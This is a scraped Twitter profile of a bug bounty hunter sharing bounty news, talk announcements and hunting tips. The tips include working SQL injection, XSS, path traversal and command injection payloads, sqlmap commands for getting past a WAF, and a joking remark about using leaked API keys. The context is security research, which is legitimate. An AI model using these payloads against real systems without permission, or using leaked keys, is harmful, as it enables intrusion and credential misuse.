Godfather Orwa 🇯🇴 Profile Banner
Godfather Orwa 🇯🇴 Profile
Godfather Orwa 🇯🇴

@GodfatherOrwa

Followers
17,713
Following
1,286
Media
385
Statuses
1,601

Hacker | Bug Hunter | Cooker | Top 3 P1 Warrior On | | LevelUpX Champion | 10+ 0Days/CVEs

Jordan
Joined June 2021
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
Pinned Tweet
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
Iam on TV 😍 Thanks @Bugcrowd the best platform and best team ❤️
@Bugcrowd
bugcrowd
1 year
MVP Champion, P1 Warrior, and #TeamHunt Hacker Cup Winner 👇 @GodfatherOrwa is this month's #ResearcherSpotlight . Visit the link below for some mid-week inspo 💡
Tweet media one
8
16
110
25
13
334
@GodfatherOrwa
Godfather Orwa 🇯🇴
10 months
7 SQLs 4 in php (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ 1 in aspx orwa';%20waitfor%20delay%20'0:0:6'%20--%20 2 in graphql orwa') OR 11=(SELECT 11 FROM PG_SLEEP(6))-- #bugbountytips #bugbountytip 💕
Tweet media one
Tweet media two
Tweet media three
37
682
2K
@GodfatherOrwa
Godfather Orwa 🇯🇴
11 months
#bugbountytips #bugbountytip add this XSS payload for your list url=%26%2302java%26%23115cript:alert(document.domain) Happy Hunting
Tweet media one
37
438
2K
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
For first time i found a SQL Injection On **sitemap.xml** endpoint 😎😎 #bugbountytips #bugbountytip target[.]com/sitemap.xml?offset=1;SELECT IF((8303>8302),SLEEP(9),2356)# sleep payload [1;SELECT IF((8303>8302),SLEEP(9),2356)#] = 9s Happy Hunting #BugBounty
Tweet media one
66
483
2K
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
url/?f=etc/passwd ==> 403 encode etc/passwd as base64 url/?f=L2V0Yy9wYXNzd2Q= ==> 200 #note you can use this trick in SQL , SSTI , XSS , LFI , Etc... #bugbountytips #bugbountytip
Tweet media one
42
411
1K
@GodfatherOrwa
Godfather Orwa 🇯🇴
10 months
add for your wordlist (common/config.php.new) Happy hunting #bugbountytip #bugbountytips
Tweet media one
34
319
1K
@GodfatherOrwa
Godfather Orwa 🇯🇴
6 months
Burp Ex 403 Bypasser 5GC API Parser Active Scan++ Backslash Powered Scanner CO2 IP Rotate J2EEScan JS Link Finder JS Miner Logger++ Log Viewer GAP Distribute Damage IIS Tilde Look Over There Param Miner Software Vulnerability Scanner SAML Raider Autorize Encode IP Asset Discovery
@GodfatherOrwa
Godfather Orwa 🇯🇴
6 months
Burp with 20 extensions, ffuf , waymore , amass , httpx , naabu , Arjun , Sqlmap , shodan cli , gittools all this tools favorite equally for me
10
78
476
17
305
1K
@GodfatherOrwa
Godfather Orwa 🇯🇴
8 months
that was very quick and amazing LFI .... filePath=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts #Bugbounty
Tweet media one
Tweet media two
24
187
953
@GodfatherOrwa
Godfather Orwa 🇯🇴
7 months
Slides of my talk in @bsidesahmedabad you can downloaded form here #bugbountytips #bugbountytip happy hunting
22
315
933
@GodfatherOrwa
Godfather Orwa 🇯🇴
5 months
Slides of my talk in bsidesodisha about •Build your setup for hunting Tools , Extensions , Etc… • Quick Orwa Methodology 2023 • SQL Injection • and for sure #bugbountytips feel free to ask about anything in comment and will try explained ❤️❤️
38
282
909
@GodfatherOrwa
Godfather Orwa 🇯🇴
8 months
Add this endpoint for you wordlist phpldapadmin/index.php and try get default login and if there's no luck try this 2 XSSs domain/phpldapadmin/cmd.php domain/cmd.php 1/2 #bugbountytips #bugbountytip
Tweet media one
12
259
833
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 month
soon enough there will be a video for BugCrwod Level Up explaining how I found 90% from P1s for the last 12 months with a lot of BB Tips
Tweet media one
52
43
835
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
P0/P1 On Google @GoogleVRP ATO / Unauthorized access / Full Admin Access Write up when bug fixed #bugbounty
Tweet media one
Tweet media two
Tweet media three
51
57
818
@GodfatherOrwa
Godfather Orwa 🇯🇴
7 months
I was working with r3aper__ for the last 6 months and I learned a lot from this amazing hunter He start creating a write ups and this is the first one Bypassing an Admin Panel with SQL Injection #bugbountytips
12
222
800
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
I earned great bounty for my submission on @bugcrowd #ItTakesACrowd #bugbountytips #bugbountytip Werkzeug frameworks that has dubug enabled so I was able to access to target[.]com/console endpoint python os commands >>> import os >>> os.listdir('/') Happy hunting
Tweet media one
37
97
737
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
الحمدالله و التوفيق من الله Yah I hacked Google Its self 😎😎 Here the write up for last critical bug I found on google #bugbountytips #BugBounty #bugbountytip
Tweet media one
42
156
738
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 month
story of very quick RCE Target/cgi-bin/dmt/reset.cgi?db_prefix=%26id%26 You can to add this paths for ur wordlist cgi-bin/dmt/reset.cgi?db_prefix=%26id%26 cgi-bin/reset.cgi?db_prefix=%26id%26 fuzzing as well cgi-bin/FUZZ.cgi?FUZZ=%26id%26 #bugbountytips ❤️
Tweet media one
14
160
711
@GodfatherOrwa
Godfather Orwa 🇯🇴
5 months
Today I completed 150 accepted SQL Injection reports just on @Bugcrowd There’s a other SQLs on H1, Meta,external programs I am happy that I got this amazing number of sql injection discoveries just in 2 years with 0 experience in all security stuff I did it , you can do it✌️
44
38
690
@GodfatherOrwa
Godfather Orwa 🇯🇴
2 months
I earned $5,000 with @XHackerx007 for submission on @bugcrowd #ItTakesACrowd For 0Day SQLI in (app extension) payload was (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ #bugbountytips #extension_Injection ✌️
33
119
679
@GodfatherOrwa
Godfather Orwa 🇯🇴
29 days
I start hunting on this BMW program 03:00AM in 03:20AM i submitted the first SQL injection Now Iam going to made something new will pickup a 5-15 random hunter from my comments and will try get 5-15 critical/exceptional and invite one collab 50% for each submission
Tweet media one
481
29
667
@GodfatherOrwa
Godfather Orwa 🇯🇴
4 months
1 located SQL in specific parameter by this sleep payload (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ 2 with waf not able to exploited via SQLmap 3 i got the origin IP then in match & replace in burp 1/2
Tweet media one
23
165
647
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
#bugbountytip #bugbountytips i found phpmyadmin template on nuclei phpmyadmin-setup.yaml next step edit that template for /admin/ template endpoint was [/pma/setup/index.php] i found 2 on [/admin/pma/setup/index.php] happy hunting ♥ #BugBounty
Tweet media one
24
123
638
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
& I earned $4,000 also for my submission on @bugcrowd #ItTakesACrowd Both of bugs it was a Unauthorized access to open dashboards #bugbountytips Scan ports top 1000 everyday , everyday naabu -list sub.txt -top-ports 1000 -exclude-ports 80,443 -o file
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
Just scored a reward @intigriti , check my profile: #HackWithIntigriti First 4 digit reward on @intigriti
12
3
170
17
140
640
@GodfatherOrwa
Godfather Orwa 🇯🇴
14 days
I earned $15,000 with @XHackerx007 for submission on @bugcrowd #ItTakesACrowd For auth bypass & full admin access write-up soon …
46
16
638
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
#bugbountytips #bugbountytip target[.]com/phpmyadmin/setup/index.php ==> 301 to login page target[.]com/phpMyAdmin/setup/index.php ==> 200 to phpmyadmin setup phpmyadmin 301 phpMyAdmin 200 happy hunting
Tweet media one
20
151
598
@GodfatherOrwa
Godfather Orwa 🇯🇴
4 months
Old but gold #bugbountytip add this for your world list .svn/entries or edit on the ready template Ex: admin/.svn/entries next step if you locate the svn configuration use svn-extractor start looking for bugs in the source
Tweet media one
6
127
553
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
all my tips and other bug hunters tips here #bugbountytip #bugbountytips
19
243
537
@GodfatherOrwa
Godfather Orwa 🇯🇴
8 months
the most beautiful N/A i ever seen
Tweet media one
39
22
521
@GodfatherOrwa
Godfather Orwa 🇯🇴
15 days
Just noticed that I am in Leaderboard (All time) top 10 for the P1s reports on @Bugcrowd and Iam very happy to share this with you all Iam not that very smart hacker , and still there’s a lot to learn, so I assure you (if I did it, you can do it) never give up ❤️
Tweet media one
69
13
501
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
Hell is coming…..
Tweet media one
21
78
479
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
Who's is excited… Who's missing some bugbounty tips.. Will be with @NahamSec in #nahamcon this year set up you reminder on this date There’s a live with new #bugbountytips at #NahamCon on June 17th This talk will be free , no subscription required
Tweet media one
13
64
486
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
1 View source 2 default/weak credentials 3 SQL Injection 4 Auth Bypass functions 5 search/fuzz for interesting endpoints and get Unauthorized access So first thing view source 🤐
@joernchen
joernchen
1 year
POV: You see this. What's the first thing you do?
Tweet media one
314
71
709
11
101
474
@GodfatherOrwa
Godfather Orwa 🇯🇴
2 months
I earned $25,000 with @XHackerx007 for submission on @bugcrowd #ItTakesACrowd For chain of bugs write-up soon …
28
21
486
@GodfatherOrwa
Godfather Orwa 🇯🇴
6 months
Burp with 20 extensions, ffuf , waymore , amass , httpx , naabu , Arjun , Sqlmap , shodan cli , gittools all this tools favorite equally for me
@Bugcrowd
bugcrowd
6 months
🚨 Giveaway day 2: 👉 Follow us @bugcrowd 💟 Like this post 🔂 Retweet with your all-time favorite tool
140
158
530
10
78
476
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
Github #bugbountytip #bugbountytips target[.]my[.]salesforce[.]com password you can find a passwords but when you try login its will ask for 2fa how you can bypass that and get critical find 1/2 Happy hunting all ♥
13
140
454
@GodfatherOrwa
Godfather Orwa 🇯🇴
8 months
To India 🇮🇳 Very excited to meet everyone in @bsidesahmedabad
Tweet media one
35
6
452
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
Why do they keep telling me that 🤣🤣 i know and i like it easy P1 #bugbountytips #bugbountytip for Unauthorized access replace my name with your domain name ==> on tap Associated Urls ==> show as 100 entries and start have nice day with that
Tweet media one
19
98
451
@GodfatherOrwa
Godfather Orwa 🇯🇴
2 months
Let’s made something new Let’s keep this tweet for question’s You can ask me here in a comment and will answers in a comment , and let’s everyone learn and found some useful questions/answers keep this tweet as reference by re-tweet #bugbounty #bugbountytips #questions ✌️
129
146
432
@GodfatherOrwa
Godfather Orwa 🇯🇴
11 months
🤣🤣🤣🤣
28
103
426
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
When you feel tired ، open GitHub
Tweet media one
33
22
427
@GodfatherOrwa
Godfather Orwa 🇯🇴
7 months
When they asked a little girl from Palestine What will you be when you grow up?? She said we never grow old, we die before 12 years old…. Completely true
Tweet media one
18
60
411
@GodfatherOrwa
Godfather Orwa 🇯🇴
6 months
Perfect post about SQLI add for that * change the request method and inject again * inject in the url it self example target/admin/1SQLPayload/xxxx *Inject the parameter it self in post request example userSQLpayload=admin&password=admin #bugbountytip #bugbountytips
@expankita
Ankita Dhakar
6 months
How to Find SQL injection in Web Apps 🧵👇🏾
5
49
254
5
99
399
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 month
earned $5,000 & $800 bonus for my submission on @bugcrowd #ItTakesACrowd
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 month
soon enough there will be a video for BugCrwod Level Up explaining how I found 90% from P1s for the last 12 months with a lot of BB Tips
Tweet media one
52
43
835
26
7
387
@GodfatherOrwa
Godfather Orwa 🇯🇴
7 months
مات الطبيب و المسعف و الجريح كل ذنبك يا فلسطين انك جميله كسيدنا يوسف و العالم خانك مثل اخوته
Tweet media one
12
70
365
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
My video of talking with @InfoSecComm & Slides About Recon skills and little #bugbountytips Hope you enjoy #bugbounty
5
111
354
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
for that i collect a huge number of bounty programs here you can download all of that as git clone ... cd x cat * > 1-file.txt and now you have everything in 1 file about 165K target cat 1-file.txt | nuclei -t your-privte-template.yaml #bugbountytips
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
If you found any bug by your testing create a nuclei template for that and start testing that template on everything You can test that on everything XSS,SQL,Info Dis, Etc.. also any #bugbountytip about some endpoint you can create a template by tat and test it #bugbounty
3
40
256
18
118
337
@GodfatherOrwa
Godfather Orwa 🇯🇴
4 months
Type: Request header Match: Host: origin IP Replace: Host: vuln host 4 sqlmap -r X.txt -p X --force-ssl --level 5 --risk 3 --dbs ---random-agent --test-filter="MySQL >= 5.0.12 AND time-based blind (query SLEEP)" --proxy http://127.0.0.1:8080 #BugBountytips #bugbountytip
Tweet media one
11
68
333
@GodfatherOrwa
Godfather Orwa 🇯🇴
4 months
❌Loaded my first critical bug for 2024 on public bounty program on @Hacker0x01 (Triaged) ❌Loaded my first critical/exceptional bug for 2024 on public bounty program on @intigriti (Triaged) ❌Loaded my first P1 bug for 2024 on public bounty program on @Bugcrowd (Pending) 😍
23
4
329
@GodfatherOrwa
Godfather Orwa 🇯🇴
3 months
Funny #bugbounty story 😬 I found a critical bug on bug bounty program on @Bugcrowd and that bug affect on a other bounty program on @Hacker0x01 the 2 programs are public , I sent the same report twice, one here and one here and yes I rewarded on the 2 programs 😎😎😎
18
9
329
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
Yah We earned $10.000 and win the hacker cup on @bugcrowd #ItTakesACrowd Tess’s Squad @GodfatherOrwa @ArmanSameer95 @haxor31337 @codecancare @XHackerx007 #hackercup #teamhunt #bugbounty Other teams you did a great job ❤️ The challenge was hard all the time Big thanks all
Tweet media one
35
16
316
@GodfatherOrwa
Godfather Orwa 🇯🇴
2 months
@Bugcrowd There’s tons of tips for using ffuf the best thing as I see from testing Finding hidden directory’s /.FUZZ /-FUZZ /~FUZZ /../FuZZ
8
57
316
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
long time ago didn't drop P1 from phone GitHub + Full charge = direct P1 😎✌️ #bugbounty
Tweet media one
Tweet media two
Tweet media three
20
18
311
@GodfatherOrwa
Godfather Orwa 🇯🇴
11 months
Email From Bounty Program About (New Target Added) 4-5 min later => P1 for a Auth Bypass…. Sometimes you find out that you are like the hackers in the movies🤣
Tweet media one
15
17
309
@GodfatherOrwa
Godfather Orwa 🇯🇴
2 months
I earned $10,000 with @XHackerx007 for submission on @bugcrowd #ItTakesACrowd and again it’s SQLI ✌️
23
7
311
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
I just become the 3rd on the @Bugcrowd P1 Warrior ♥ sorry @haxor31337 its cold down there 🤣🤣
Tweet media one
32
6
297
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
I back with new account same username handle @GodfatherOrwa So all who know me you can follow me again 😂 And from today A lot of #bugbountytips #bugbountytip And lts get back and make it rain P1s✌️
55
41
292
@GodfatherOrwa
Godfather Orwa 🇯🇴
8 months
P1 $6500 P2 $3000 P3 no bounty Critical auth bypass mark as P3 Default credentials & LDAP injection mark as P3 Program keep changing P1s to P3s to save budget And changing of P3s all the time after take down the hosts This is called commercial fraud 🤣 Sad story’s 🤣
35
19
288
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
For who asking about sqlmap command in this case sqlmap -u "target/sitemap.xml?offset=1" -p offset --level 5 --risk 3 --dbms=MySQL --hostname --test-filter="MySQL >= 5.0.12 stacked queries"
9
74
282
@GodfatherOrwa
Godfather Orwa 🇯🇴
8 months
i received some questions to speak about in @bsidesahmedabad so i added to my talk in the [Power Of Recon] 1 my method to bypass waf 2 my method to get more subdomains 3 my method to find more domains / 3rd patys / endpoints #bugbountytips
12
33
282
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
Tweet media one
@Bugcrowd
bugcrowd
1 year
We're rolling out the red carpet as the #BuggyAwards are back! 🐛🏆 Help us recognize those who have gone above and beyond in their security efforts! 🔥 Don't miss this👇 🔗:
Tweet media one
2
2
39
32
4
278
@GodfatherOrwa
Godfather Orwa 🇯🇴
6 months
Just joined P1 Warrior Level 8 in @Bugcrowd 😎😎😎😎😎 It’s time to start working on Level 9 …..
Tweet media one
33
6
282
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
Bug here i was access to symfony open profiler & toolbar access that's led to chain of bugs such as [ auth bypass , auth LFI , unauth LFI , StoredXSS , Etc...] for more info read about Symfony web debug toolbar & Symfony Profiler open #bugbountytips
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
me & @XHackerx007 earned $35,000 for our submission on @bugcrowd #ItTakesACrowd live is good , bounty is good thanks for @bugcrowd triaged team for quick triage from @sh_timmy
55
25
429
14
41
275
@GodfatherOrwa
Godfather Orwa 🇯🇴
2 months
#NewProfilePic When a pigeon comes to take pictures with you 🤣
Tweet media one
18
1
278
@GodfatherOrwa
Godfather Orwa 🇯🇴
6 months
Not Full impact 🤣 but I think it’s enough….
Tweet media one
Tweet media two
15
6
268
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 month
Tweet media one
Tweet media two
10
11
266
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
If you found any bug by your testing create a nuclei template for that and start testing that template on everything You can test that on everything XSS,SQL,Info Dis, Etc.. also any #bugbountytip about some endpoint you can create a template by tat and test it #bugbounty
3
40
256
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
The taste of success is great
Tweet media one
10
1
250
@GodfatherOrwa
Godfather Orwa 🇯🇴
7 months
I was amazing conference , thanks for @bsidesahmedabad @niksthehacker
Tweet media one
Tweet media two
Tweet media three
Tweet media four
12
8
244
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
dreams without goals ، are just dreams
12
19
236
@GodfatherOrwa
Godfather Orwa 🇯🇴
2 months
I still remember first day when I asked @XHackerx007 to collaborate with me on #Fisglobal program in (08 Sep 2021) and from that date till today me & HackerX007 working fully on FIS , we still finding critical bugs we can say that we know about FIS more than FIS employees 1/2
11
9
239
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
#BugBounty #infosec I Just Back 😎 My account has been closed by Twitter it’s self After this, someone else took over my account It wasn't hacked It was something bad from Twitter Twitter support very bad The story: 1/5
32
16
230
@GodfatherOrwa
Godfather Orwa 🇯🇴
2 months
and here up the writeup for amazing bugs, we found this week and get a reward 25K & 10K hope you enjoy the write #Bugbounty #bugbountytip #bugbountytips
6
24
234
@GodfatherOrwa
Godfather Orwa 🇯🇴
8 months
cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3CScRiPt%20%3Ealert(%27Orwa%27)%3C/ScRiPt%3E&meth=ajax&server_id=1 cmd.php?server_id=<script>alert('Orwa')</script> you can also try replace cmd.php to index.php 2/2 Happy hunting
0
40
227
@GodfatherOrwa
Godfather Orwa 🇯🇴
2 months
@Bugcrowd Who’s asking about what wordlist I use I use mostly and Important note all the time update your wordlist manually by adding interesting endpoints / dirs that you have
3
68
228
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
One of the longest titles submitted
Tweet media one
18
7
224
@GodfatherOrwa
Godfather Orwa 🇯🇴
6 months
We earned $4300 for our submission on @bugcrowd in team hunt #HackerCup #ItTakesACrowd Our squad is back again @XHackerx007 @haxor31337 @ArmanSameer95 @codecancare
17
4
226
@GodfatherOrwa
Godfather Orwa 🇯🇴
6 months
Who misses me? i will be in india again and again another recon/bugbounty topic #bugbounty
@bsidesodisha
BSidesOdisha
6 months
🎤 Speaker Update🌐 We're thrilled to announce @GodfatherOrwa as our Tech Speaker for BSides Odisha 2023 event. Date: 2nd December 2023 🕤 Time: 9:00AM onwards 📋 Agenda: Stay tuned for updates 📍 Location: PAL Heights ,Jayadev Vihar, Bhubaneswar, Odisha #BSidesOdisha2023
Tweet media one
1
8
70
20
20
220
@GodfatherOrwa
Godfather Orwa 🇯🇴
10 months
@bsidesahmedabad
Security BSides Ahmedabad
10 months
👾 Coming up next in our Tech Speaker series we have @GodfatherOrwa ! 🎯 He is all set to enlighten us with his insights on "The Power of Recon." 🧑🏼‍💻 A distinguished security researcher, Bug Bounty Hunter and boasts impressive accolades as a Hack Cup and LevelUpX champion,
Tweet media one
6
23
112
8
25
216
@GodfatherOrwa
Godfather Orwa 🇯🇴
11 months
@0x_rood clientID:clientSercret ==> base64KEY next step curl -X POST '' \ -H 'Authorization: Basic base64KEY'\ -H 'Content-Type: application/x-www-form-urlencoded' \ -d 'grant_type=client_credentials'
9
44
208
@GodfatherOrwa
Godfather Orwa 🇯🇴
5 months
merry christmas ❤️
23
9
209
@GodfatherOrwa
Godfather Orwa 🇯🇴
5 months
its the best time looking for 0Days,CVEs during Christmas holiday 😈 and yes first 0day (medium) has been located 👍 I'm working now on the second 0day (critical) ✌️ #bugbounty
Tweet media one
22
8
204
@GodfatherOrwa
Godfather Orwa 🇯🇴
10 months
😎😎😎😎
@Bugcrowd
bugcrowd
10 months
this is him now
Tweet media one
3
3
86
5
3
203
@GodfatherOrwa
Godfather Orwa 🇯🇴
10 months
@krishnsec Thank you bug bounty …
Tweet media one
21
10
200
@GodfatherOrwa
Godfather Orwa 🇯🇴
8 months
guess what..... let's do something new besides that i'm going to speak tomorrow in @bsidesahmedabad don't be shy to catch me and talk to me , telling me where you stuck , in my turn i assure we will fix that by giving you personalized #bugbountytip /s best wishes everyone♥
9
13
201
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
@HusseiN98D All respect for u hussein I donate 20% of every bounty I get to help poor people In the past, I was suffering from poverty, so I could not complete my studies and did not obtain certificates 1/2
7
7
196
@GodfatherOrwa
Godfather Orwa 🇯🇴
5 months
@amit___009 Continue fuzzing as example Target/BPDEV_FUZZ This wordlist will be helpful And valid endpoint such as 403/301/302/200 Send it again to IIS scanner
1
27
194
@GodfatherOrwa
Godfather Orwa 🇯🇴
12 days
@abdallah_osman4 @0x_rood 1 install waymore tool -i domain -mode U And send all the results to burp 2 start bing and google dorking on the same proxy browser to get all the results to burp 3 install GAP extension and then send the target to GAP there’s lot to do, this start
6
39
194
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
👀👀👀👀👀👀👀👀👀 its was easy like 1 2 3 if get triaged will tweet about it
Tweet media one
11
6
190
@GodfatherOrwa
Godfather Orwa 🇯🇴
5 months
@Jhaddix @Bugcrowd Hi sir , no your not alone 😊 This a screenshot from me last talk in Bsides I was talking about that Playing with custom headers can bring a good results
Tweet media one
6
21
188
@GodfatherOrwa
Godfather Orwa 🇯🇴
7 months
@HusseiN98D Burp pro , shodan , censys , urlscan , fofa , intelx , netlas Securitytrails expensive so I use leaked api keys on GitHub 🤣😎
5
16
189
@GodfatherOrwa
Godfather Orwa 🇯🇴
10 months
My interview with @NahamSec Thanks Ben #bugbountytips #Recon
@NahamSec
Ben Sadeghipour
10 months
Just released my interview with @GodfatherOrwa ! 👀👀
3
45
207
12
15
186
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 year
This one it’s not about the bug it’s self It’s about how you testing and never give up and keep testing and trying You should keep this write up next to you when you hunt for ATO Well done omar 👍👍
@OmarHashem666
Omar Hashem
1 year
Hello everyone, as promised, this is a detailed write-up on how I was able to get an account takeover in HubSpot Public Bug Bounty Program #BugBounty #bugbountytips #Pentesting #cybersecurite #infosec ATO
79
374
1K
4
22
177
@GodfatherOrwa
Godfather Orwa 🇯🇴
8 months
If you want start play with GraphQL You can start from here …
@Masonhck3571
Masonhck357
2 years
So it seems like everybody hates hacking GraphQL like me, so lets post some resources so we can all get better at it!
35
295
819
4
25
175
@GodfatherOrwa
Godfather Orwa 🇯🇴
1 month
In arab community lot of people when they report a bug for VdP program they start making courses, and videos and tips , etc.. That’s why there’s tons of bad content for Arabic bug bounty the best Arabic content I found ever till today is @SirBagoza content and I suggest that
5
6
171
@GodfatherOrwa
Godfather Orwa 🇯🇴
6 months
@intigriti It’s depends how you look for RCE Some look for RCE as bug Some look for RCE as impact As example LFI to RCE (the bug is LFI and the Impact is RCE) I look for RCE as impact not bug & I automate on bugs that can led for RCEs
6
19
170